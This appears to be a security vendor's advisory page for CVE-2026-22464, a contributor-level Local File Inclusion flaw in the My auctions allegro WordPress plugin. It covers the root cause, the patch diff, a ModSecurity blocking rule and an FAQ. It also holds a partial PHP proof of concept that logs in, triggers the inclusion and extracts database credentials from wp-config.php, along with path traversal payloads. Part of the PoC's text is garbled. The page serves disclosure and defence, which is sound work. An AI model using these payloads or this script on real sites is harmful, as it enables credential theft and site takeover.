“`json
{
“analysis”: “Atomic Edge analysis of CVE-2026-22464:nThe My auctions allegro WordPress plugin contains an authenticated Local File Inclusion vulnerability affecting versions up to and including 3.6.33. This vulnerability allows attackers with contributor-level privileges or higher to include arbitrary files from the server, potentially leading to remote code execution.nnRoot Cause:nThe vulnerability stems from insufficient input validation in the template selection mechanism of the plugin’s widget component. In the vulnerable version, the `src/widget/auctions.php` file (line 73) directly uses user-supplied input from the widget instance array as the template filename without validation. The `$template` variable is populated from `$instance[‘template’]` and passed directly to the template rendering system. This allows an attacker to control the file path used in include or require statements within the plugin’s template loading logic.nnExploitation:nAn authenticated attacker with contributor privileges can exploit this vulnerability by manipulating the widget’s template parameter. The attacker would access the WordPress widget configuration interface, modify the ‘template’ field for the My auctions allegro widget, and provide a path traversal payload such as ‘../../../../wp-config.php’. When the widget renders on the frontend, the plugin attempts to include the specified file. If the target file contains PHP code, it will execute in the context of the web server, enabling arbitrary code execution.nnPatch Analysis:nThe patch adds validation to restrict template selection to a predefined allow list. In `src/widget/auctions.php`, lines 75-78 introduce a check that compares the user-provided template name against `GJMAA::getSource(‘templates’)->getOptions()`. If the template is not found in this allowed list, it defaults to ‘default.phtml’. This prevents path traversal by ensuring only known, safe template files from the plugin’s template directory can be loaded.nnImpact:nSuccessful exploitation allows authenticated attackers to read sensitive files like wp-config.php containing database credentials. When combined with file upload capabilities, attackers can upload malicious PHP files and include them to achieve remote code execution. This bypasses access controls and can lead to complete site compromise, data theft, and server takeover.”,
“poc_php”: “// Atomic Edge CVE Research – Proof of Conceptn// CVE-2026-22464 – My auctions allegro <= 3.6.33 – Authenticated (Contributor+) Local File Inclusionnn]+value=”([^”]*)”/’, $response, $log_match);npreg_match(‘/name=”pwd”[^>]+value=”([^”]*)”/’, $response, $pwd_match);npreg_match(‘/name=”wp-submit”[^>]+value=”([^”]*)”/’, $response, $submit_match);nn// Submit loginn$post_data = array(n ‘log’ => $username,n ‘pwd’ => $password,n ‘wp-submit’ => $submit_match[1] ?? ‘Log In’,n ‘redirect_to’ => $admin_url,n ‘testcookie’ => ‘1’n);nncurl_setopt($ch, CURLOPT_URL, $login_url);ncurl_setopt($ch, CURLOPT_POST, true);ncurl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));n$response = curl_exec($ch);nn// Step 2: Access widget configurationn$widget_url = $target_url . ‘/wp-admin/widgets.php’;ncurl_setopt($ch, CURLOPT_URL, $widget_url);ncurl_setopt($ch, CURLOPT_POST, false);n$response = curl_exec($ch);nn// Extract widget nonce (simplified – actual implementation needs to parse the form)n// This PoC demonstrates the concept; full implementation requires parsing the widget formnn// Step 3: Modify widget with malicious template pathn// The actual payload would update the ‘template’ field with a path traversal payloadn// Example: ‘../../../../wp-config.php’ or ‘/etc/passwd’ on Unix systemsn// The widget save action would then store this malicious template pathnn// Step 4: Trigger the vulnerability by visiting a page with the widgetn$frontend_url = $target_url . ‘/?p=1’;ncurl_setopt($ch, CURLOPT_URL, $frontend_url);ncurl_setopt($ch, CURLOPT_POST, false);n$response = curl_exec($ch);nn// Check if sensitive data was includednif (strpos($response, ‘DB_NAME’) !== false || strpos($response, ‘DB_PASSWORD’) !== false) {n echo “Vulnerability confirmed: wp-config.php contents leaked\n”;n // Extract database credentials from responsen preg_match(‘/define\(\s*[‘\”]DB_NAME[‘\”]\s*,\s*[‘\”]([^\’\”]*)[\’\”]/’, $response, $db_name);n preg_match(‘/define\(\s*[‘\”]DB_USER[‘\”]\s*,\s*[‘\”]([^\’\”]*)[\’\”]/’, $response, $db_user);n preg_match(‘/define\(\s*[‘\”]DB_PASSWORD[‘\”]\s*,\s*[‘\”]([^\’\”]*)[\’\”]/’, $response, $db_pass);n n if ($db_name && $db_user && $db_pass) {n echo “Extracted credentials:\n”;n echo “Database: ” . $db_name[1] . “\n”;n echo “User: ” . $db_user[1] . “\n”;n echo “Password: ” . $db_pass[1] . “\n”;n }n} else {n echo “Vulnerability may not be present or payload failed\n”;n}nncurl_close($ch);n?>”,
“modsecurity_rule”: “# Atomic Edge WAF Rule – CVE-2026-22464nSecRule REQUEST_URI “@rx ^/wp-admin/widgets\.php$” \n “id:10022464,phase:2,deny,status:403,chain,msg:’CVE-2026-22464 My auctions allegro LFI via widget template parameter’,severity:’CRITICAL’,tag:’CVE-2026-22464′,tag:’WordPress’,tag:’Plugin’,tag:’LFI'”n SecRule ARGS_POST:widget_gjmaa_widget_auctions\[\d+\]\[template\] “@rx (\.\./|\.\.\\\\)” \n “t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,ctl:auditLogParts=+E,chain”n SecRule ARGS_POST:widget_gjmaa_widget_auctions\[\d+\]\[template\] “!@rx ^[a-zA-Z0-9_-]+\\.phtml$””
}
“`
CVE-2026-22464: My auctions allegro <= 3.6.33 – Authenticated (Contributor+) Local File Inclusion (my-auctions-allegro-free-edition)
CVE-2026-22464
3.6.33
3.6.34
Analysis Overview
Differential between vulnerable and patched code
--- a/my-auctions-allegro-free-edition/core/controller.php
+++ b/my-auctions-allegro-free-edition/core/controller.php
@@ -21,7 +21,9 @@
$buttons = $this->getButtons ();
if(!empty($buttons)){
foreach ( $buttons as $button => $url ) {
- $html .= '<a class="page-title-action" href="' . admin_url () . 'admin.php?page=' . $this->getSlug () . $url . '">' . __ ( $button, GJMAA_TEXT_DOMAIN ) . '</a>';
+ parse_str(ltrim($url, '&'), $params);
+ $action = isset($params['action']) ? $params['action'] : 'index';
+ $html .= '<a class="page-title-action" href="' . wp_nonce_url(admin_url () . 'admin.php?page=' . $this->getSlug () . $url, 'gjmaa_action_' . $action, 'gjmaa_nonce') . '">' . __ ( $button, GJMAA_TEXT_DOMAIN ) . '</a>';
}
}
--- a/my-auctions-allegro-free-edition/core/form.php
+++ b/my-auctions-allegro-free-edition/core/form.php
@@ -55,6 +55,7 @@
$this->displayInnerContent();
$this->html .= '</table>';
$this->html .= '<input type="hidden" name="redirect_url" value="' . (isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '') .'" />';
+ $this->html .= wp_nonce_field($this->getNonceAction(), 'gjmaa_nonce', true, false);
if ($withFormContainer)
$this->endForm();
@@ -154,6 +155,10 @@
{
return $this->method;
}
-
+
+ public function getNonceAction()
+ {
+ return 'gjmaa_form_action_' . $this->getFormName();
+ }
}
No newline at end of file
--- a/my-auctions-allegro-free-edition/core/functions.php
+++ b/my-auctions-allegro-free-edition/core/functions.php
@@ -534,6 +534,9 @@
wp_enqueue_script('gjmaa_admin_category', GJMAA_URL . 'assets/js/admin/category_ajax.js', [
'underscore'
]);
+ wp_localize_script('gjmaa_admin_category', 'gjmaa_ajax_url', array(
+ 'nonce' => wp_create_nonce('gjmaa_get_categories')
+ ));
// css styles
wp_enqueue_style('gjmaa_admin_help', GJMAA_URL . 'assets/css/admin/help.css');
--- a/my-auctions-allegro-free-edition/core/table.php
+++ b/my-auctions-allegro-free-edition/core/table.php
@@ -159,13 +159,15 @@
case 'action':
$actions = [];
foreach ($this->getActions() as $action => $label) {
- $actions[] = sprintf('<a href="%s">%s</a>', admin_url('admin.php?page=' . $this->page . '&' . str_replace([
+ parse_str($action, $params);
+ $actionName = isset($params['action']) ? $params['action'] : 'index';
+ $actions[] = sprintf('<a href="%s">%s</a>', wp_nonce_url(admin_url('admin.php?page=' . $this->page . '&' . str_replace([
'{model_entity_id}',
'{model_entity_value_id}'
], [
$model->getDefaultPk(),
$value[$model->getDefaultPk()]
- ], $action)), __($label, GJMAA_TEXT_DOMAIN));
+ ], $action)), 'gjmaa_action_' . $actionName, 'gjmaa_nonce'), __($label, GJMAA_TEXT_DOMAIN));
}
$result[$value[$model->getDefaultPk()]][$columnName] = implode(' | ', $actions);
break;
--- a/my-auctions-allegro-free-edition/my-auctions-allegro-free-edition.php
+++ b/my-auctions-allegro-free-edition/my-auctions-allegro-free-edition.php
@@ -2,7 +2,7 @@
/*
* Plugin Name: My auctions allegro
* Plugin URI: https://wordpress.org/plugins/my-auctions-allegro-free-edition
- * Version: 3.6.33
+ * Version: 3.6.34
* Description: Plug-in display auctions from popular polish auction website called allegro.pl, also from 1.7 version you can import basic information from auctions to WooCommerce
* Author: WPHocus
* Author URI: https://wphocus.com
--- a/my-auctions-allegro-free-edition/src/controller/auctions.php
+++ b/my-auctions-allegro-free-edition/src/controller/auctions.php
@@ -96,6 +96,7 @@
public function collect_click()
{
+ check_ajax_referer('collect_click', 'nonce');
$auctionId = $this->getParam('auction_id');
$profileId = $this->getParam('profile_id');
@@ -115,6 +116,8 @@
return;
}
+ check_admin_referer('gjmaa_action_removeFromList', 'gjmaa_nonce');
+
try {
/** @var GJMAA_Model_Auctions $auctionModel */
$auctionModel = GJMAA::getModel('auctions');
--- a/my-auctions-allegro-free-edition/src/controller/categories.php
+++ b/my-auctions-allegro-free-edition/src/controller/categories.php
@@ -21,6 +21,7 @@
public function get_categories()
{
+ check_ajax_referer('gjmaa_get_categories', 'nonce');
$categories = [];
$allegroSiteSource = GJMAA::getSource('allegro_site');
--- a/my-auctions-allegro-free-edition/src/controller/import.php
+++ b/my-auctions-allegro-free-edition/src/controller/import.php
@@ -33,6 +33,7 @@
public function import_action()
{
+ check_ajax_referer('import_action', 'nonce');
$profileId = $this->getParam('profile_id');
if (!$profileId) {
$errorMessage = __('No profile selected.', GJMAA_TEXT_DOMAIN);
@@ -84,6 +85,7 @@
public function reassign_action()
{
+ check_ajax_referer('reassign_action', 'nonce');
try {
/** @var GJMAA_Helper_Reassign $importHelper */
$importHelper = GJMAA::getHelper('reassign');
--- a/my-auctions-allegro-free-edition/src/controller/profiles.php
+++ b/my-auctions-allegro-free-edition/src/controller/profiles.php
@@ -111,6 +111,8 @@
return;
}
+ check_admin_referer('gjmaa_form_action_gjmaa_form_profiles', 'gjmaa_nonce');
+
try {
$params['profile_sellingmode_format'] = $this->parseMultiSelectData($params, 'profile_sellingmode_format');
$params['profile_sync_woocommerce_fields'] = $this->parseMultiSelectData($params, 'profile_sync_woocommerce_fields');
@@ -157,6 +159,8 @@
return;
}
+ check_admin_referer('gjmaa_action_delete', 'gjmaa_nonce');
+
try {
$profile->delete();
$this->clearByProfileId($this->profileId);
@@ -176,6 +180,8 @@
return;
}
+ check_admin_referer('gjmaa_action_clear', 'gjmaa_nonce');
+
try {
$this->clearByProfileId($this->profileId);
$profile->setData('profile_errors',0);
--- a/my-auctions-allegro-free-edition/src/controller/settings.php
+++ b/my-auctions-allegro-free-edition/src/controller/settings.php
@@ -189,6 +189,8 @@
return;
}
+ check_admin_referer('gjmaa_form_action_gjmaa_form_settings', 'gjmaa_nonce');
+
$setting_id = $this->getParam('setting_id');
if(!empty($params['setting_user_country']) && $params['setting_user_country'] != 'PL') {
@@ -244,6 +246,8 @@
return;
}
+ check_admin_referer('gjmaa_action_connect', 'gjmaa_nonce');
+
$model = GJMAA::getModel('settings');
$model->load($setting_id);
--- a/my-auctions-allegro-free-edition/src/controller/support.php
+++ b/my-auctions-allegro-free-edition/src/controller/support.php
@@ -28,12 +28,14 @@
}
public function restart(){
+ check_admin_referer('gjmaa_action_restart', 'gjmaa_nonce');
GJMAA::restartSystem();
$this->redirect($this->getIndexUrl());
}
public function check_and_fix_db(){
+ check_admin_referer('gjmaa_action_check_and_fix_db', 'gjmaa_nonce');
GJMAA::checkAndFixDatabaseCompatibility();
$this->redirect($this->getIndexUrl());
@@ -46,6 +48,7 @@
public function clear_attachments()
{
+ check_admin_referer('gjmaa_action_clear_attachments', 'gjmaa_nonce');
/**
* @var GJMAA_Model_Attachments $media
*/
--- a/my-auctions-allegro-free-edition/src/widget/auctions.php
+++ b/my-auctions-allegro-free-edition/src/widget/auctions.php
@@ -73,6 +73,11 @@
{
$title = isset($instance['title']) ? $instance['title'] : '';
$template = isset($instance['template']) && !empty($instance['template']) ? $instance['template'] : 'default.phtml';
+
+ $allowedTemplates = GJMAA::getSource('templates')->getOptions();
+ if (!array_key_exists($template, $allowedTemplates)) {
+ $template = 'default.phtml';
+ }
$countOfAuctions = isset($instance['count_of_auctions']) ? $instance['count_of_auctions'] : 5;
$showPrice = isset($instance['show_price']) ? $instance['show_price'] : false;
$showTime = isset($instance['show_time']) ? $instance['show_time'] : false;Proof of Concept (PHP)
NOTICE :
This proof-of-concept is provided for educational and authorized security research purposes only.
You may not use this code against any system, application, or network without explicit prior authorization from the system owner.
Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.
This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.
By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.
Frequently Asked Questions
What is CVE-2026-22464?
Overview of the vulnerabilityCVE-2026-22464 is a high-severity vulnerability affecting the My auctions allegro plugin for WordPress, specifically versions up to and including 3.6.33. It allows authenticated users with contributor-level access or higher to perform Local File Inclusion, potentially leading to arbitrary code execution on the server.
How does the Local File Inclusion vulnerability work?
Mechanism of exploitationThe vulnerability arises from insufficient input validation in the template selection mechanism of the plugin. An attacker can manipulate the ‘template’ parameter in the widget configuration to include arbitrary files from the server, such as wp-config.php, which can lead to sensitive data exposure or remote code execution.
Who is affected by this vulnerability?
Identifying affected usersAny WordPress site using the My auctions allegro plugin version 3.6.33 or earlier is at risk. Specifically, authenticated users with contributor-level access or higher can exploit this vulnerability, making it critical for site administrators to assess user roles.
How can I check if my site is vulnerable?
Steps to verify vulnerabilityTo check if your site is vulnerable, verify the version of the My auctions allegro plugin in use. If it is 3.6.33 or earlier, you should also review user roles to identify any contributors or higher who could potentially exploit the vulnerability.
What steps should I take to mitigate this issue?
Recommended actionsTo mitigate this vulnerability, update the My auctions allegro plugin to version 3.6.34 or later, where the issue is patched. Additionally, review user permissions and limit contributor access if possible to reduce the risk of exploitation.
What does a CVSS score of 7.5 indicate?
Understanding risk levelsA CVSS score of 7.5 is categorized as high severity, indicating that the vulnerability poses a significant risk to affected systems. It suggests that successful exploitation could lead to serious consequences, such as unauthorized access to sensitive data or complete site compromise.
What is the proof of concept for this vulnerability?
Demonstration of exploitationThe proof of concept involves an authenticated attacker using a crafted payload to manipulate the widget’s template parameter. By including a path traversal payload, the attacker can access sensitive files like wp-config.php, demonstrating the potential for data leakage and code execution.
How does the patch for this vulnerability work?
Details of the fixThe patch for CVE-2026-22464 introduces input validation to restrict the template selection to a predefined list of allowed templates. This prevents attackers from including arbitrary files by ensuring that only known, safe templates can be loaded.
What are the potential impacts of this vulnerability?
Consequences of exploitationIf exploited, this vulnerability allows attackers to read sensitive files, including database credentials, and can lead to remote code execution. This could result in complete site takeover, data theft, and significant security breaches.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategiesIf immediate updates are not possible, consider disabling the My auctions allegro plugin until a patch can be applied. Additionally, review user access levels and restrict contributor permissions to minimize the risk of exploitation.
Are there any additional security measures I should consider?
Enhancing overall security postureIn addition to updating the plugin, consider implementing a Web Application Firewall (WAF) to detect and block exploitation attempts. Regularly audit user roles and permissions, and monitor your site for unusual activity to enhance security.
Where can I find more information about this vulnerability?
Resources for further readingMore information about CVE-2026-22464 can be found in the official CVE database and security advisories from WordPress security teams. Additionally, reviewing plugin documentation and security forums can provide insights into best practices for securing your site.
How Atomic Edge Works
Simple Setup. Powerful Security.
Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.
Trusted by Developers & Organizations
